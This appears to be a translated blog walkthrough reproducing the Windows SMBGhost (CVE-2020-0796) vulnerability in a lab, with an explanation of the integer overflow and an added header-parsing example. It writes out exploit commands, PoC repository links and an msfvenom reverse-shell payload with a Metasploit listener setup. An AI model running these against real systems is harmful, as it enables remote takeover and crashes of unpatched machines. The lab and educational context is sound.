Vulnerability reproduction: CVE-2020-0796 "Eternal Black", pitfalls encountered and resolved

2022-06-10 07:54:00 qq_ fifty-one million five hundred and fifty thousand seven hun

Vulnerability profile

"Eternal Black" (CVE-2020-0796, also known as SMBGhost) is very similar to "Eternal Blue": both exploit a vulnerability in the Windows SMB service to remotely obtain the highest privileges on the system.

Vulnerability level: high-risk

What makes "Eternal Black" especially dangerous is that it can also be used against SMB clients: an attacker can craft a specially prepared web page, archive, shared directory, Office document, etc., and send it to the target. As soon as the target opens it, the vulnerability is triggered and the machine is attacked.

Attack principle:
The vulnerability stems from incorrect handling of SMBv3 compressed packets. When decompressing a packet, the server uses the length supplied by the client without checking whether it is valid, which results in an integer overflow. By exploiting it, an attacker can directly and remotely execute arbitrary malicious code on an SMB server, or set up a malicious SMB server and induce clients to connect to it, attacking clients at scale. Once Eternal Black is exploited successfully, its impact is no less than that of Eternal Blue.

Cause of the vulnerability:
CVE-2020-0796 lies in the Windows driver srv2.sys of the affected versions. When Windows SMB was updated to version 3.1.1, support for compressed data was added, but the legitimacy of the compressed data sent by the user is not verified.
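As an added example (not code from this post or from any of the tools it names), the snippet below parses the SMB2 compression transform header, mirrors the unchecked length arithmetic described above, and shows the bounds check that prevents the overflow. The header layout follows MS-SMB2 section 2.2.42; all sample values are constructed.

```python
# Added example: SMB2 compression transform header parsing with an
# unchecked length sum (the bug class described in the write-up) next to
# a bounds-checked version. Header layout per MS-SMB2 2.2.42:
# ProtocolId (4 bytes, 0xFC 'S' 'M' 'B'), OriginalCompressedSegmentSize (u32),
# CompressionAlgorithm (u16), Flags (u16), Offset/Length (u32), little-endian.
import struct

PROTOCOL_ID = b"\xfcSMB"
HEADER_FMT = "<4sIHHI"
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 16 bytes
U32_MAX = 0xFFFFFFFF


def parse_header(data: bytes) -> dict:
    """Split the 16-byte compression transform header into its fields."""
    if len(data) < HEADER_LEN:
        raise ValueError("short packet")
    proto, orig_size, algo, flags, offset = struct.unpack_from(HEADER_FMT, data)
    if proto != PROTOCOL_ID:
        raise ValueError("not a compression transform header")
    return {"orig_size": orig_size, "algo": algo, "flags": flags, "offset": offset}


def buffer_size_unchecked(hdr: dict) -> int:
    """Pattern the write-up describes: add the two client-supplied lengths
    in 32-bit arithmetic and trust the result as an allocation size."""
    return (hdr["orig_size"] + hdr["offset"]) & U32_MAX


def buffer_size_checked(hdr: dict, packet_len: int) -> int:
    """Hardened version: reject sums that wrap or point past the packet."""
    total = hdr["orig_size"] + hdr["offset"]  # Python ints do not wrap
    if total > U32_MAX:
        raise ValueError("length fields overflow 32 bits")
    if hdr["offset"] > packet_len - HEADER_LEN:
        raise ValueError("offset points past the received data")
    return total


def make_header(orig_size: int, offset: int, algo: int = 1) -> bytes:
    """Constructed header for the demo (algo 1 = LZNT1 in MS-SMB2)."""
    return struct.pack(HEADER_FMT, PROTOCOL_ID, orig_size, algo, 0, offset)


if __name__ == "__main__":
    # Constructed packet: a huge OriginalCompressedSegmentSize plus a small Offset
    # wraps to 0xF in 32-bit arithmetic, so the unchecked size is tiny.
    pkt = make_header(0xFFFFFFFF, 0x10) + b"\x00" * 0x10
    hdr = parse_header(pkt)
    print(hex(buffer_size_unchecked(hdr)))  # 0xf
    try:
        buffer_size_checked(hdr, len(pkt))
    except ValueError as exc:
        print("rejected:", exc)
```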

Affected Windows versions

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows 10 Version 1909 for x64-based Systems
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)

Environment preparation

1. An affected Windows version
I used Windows 10 1903 Enterprise 64-bit (installed specifically for this).
For the image, I suggest downloading what you need from https://msdn.itellyou.cn.

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
Confirm that the target Windows system is an affected version

To check the Windows version, press Win+R and type winver in the Run window that pops up.

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

Next, enable the SMB service:
How to enable the SMB service on Win10:
1. Press the Win+R shortcut, type control in the Run window, and confirm;
2. In the window that opens, click "Programs";
3. In the next window, click "Turn Windows features on or off";
4. In the Windows Features window, select everything under "SMB 1.0/CIFS File Sharing Support" and confirm;
5. Wait while the required files are searched for; the feature is then enabled automatically;
6. When the final window appears, restart the computer (save any open files first).

2. A second, normal computer (also Windows, because an exe file has to be run)

Target IP: 172.16.135.138
Attacker IP: 172.16.135.137

Procedure

[1] Use Qi An Xin's vulnerability detection tool

Start CVE-2020-0796-Scanner.exe directly from cmd
(double-clicking it is not recommended, since the window tends to close immediately).

Enter the target IP or IP range to scan when prompted.

(For convenience I simply scanned 172.16.135.138-172.16.135.142.)

[2] Prepare the blue-screen payload
Use the CVE-2020-0796 blue-screen tool against the target:

python3 CVE-2020-0796.py <IP found vulnerable>

python3 CVE-2020-0796.py 172.16.135.138

If the target does not blue-screen, run it again (pit 1: Python 3.9 on Kali never worked; switching to Python 3.10 on the physical machine fixed it).
Reproduction on the physical machine worked.

With Python 3.9 on Kali, the target never blue-screened, no matter what.
With the Win10 virtual machine it worked.

Other detection methods

Besides Qi An Xin's detection tool CVE-2020-0796-Scanner.exe, you can also try SMBGhost.

(1) SMBGhost

Download address: https://github.com/ollypwn/SMBGhost

Download:

git clone https://github.com/ly4k/SMBGhost.git

Scan:

python3 scanner.py <IP>

(2) Use the blue-screen payload to verify the vulnerability

Blue-screen PoC address: https://github.com/chompie1337/SMBGhost_RCE_PoC

Install:

git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git

Usage:

python exploit.py -ip 192.168.142.131

If it does not succeed, try switching the Python version (pit 2: it could not be reproduced with Python 3.9, but 3.10 works).
With 3.10 the reproduction succeeded for me.

With 3.9, however, it does not work.

Using msf to generate the exploit's reverse shell

First:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.135.203 lport=1335 -b '\x00' -f python

Meaning of each parameter:

-p     specifies the payload; here windows/x64/meterpreter/reverse_tcp
lhost  the listening host (the attacker's address)
lport  the listening port
-b     sets the characters to avoid, e.g. '\x00\xff'
-i     specifies the number of encoding iterations of the payload
-f     specifies the output format

Then combine it with SMBGhost_RCE_PoC-master to attack.
Note:
The original exploit.py in SMBGhost_RCE_PoC-master cannot be used for the attack as-is; you need to modify its USER_PAYLOAD section.

Start msf:
msfconsole

Use the handler module:
use exploit/multi/handler
Set the payload:
set payload windows/x64/meterpreter/reverse_tcp
Configure the options (lhost and lport must match the ones given to msfvenom),
then run.

Then go back to SMBGhost_RCE_PoC-master and attack:
python3 exploit.py -ip

Then press Enter to get the shell.
In any case, I did get the blue screen.

But I did not get a shell; I then switched to another Kali, and still nothing...
Then I asked an expert, who said the vulnerability itself can give a shell, but it is not very stable and is not used much.

It is probably the target machine; a genuinely vulnerable target should reproduce it.

Original site

Copyright notice
This article was written by [qq_ fifty-one million five hundred and fifty thousand seven hun]; please include a link to the original when reposting. Thanks.
https://yzsam.com/2022/161/202206100743408412.html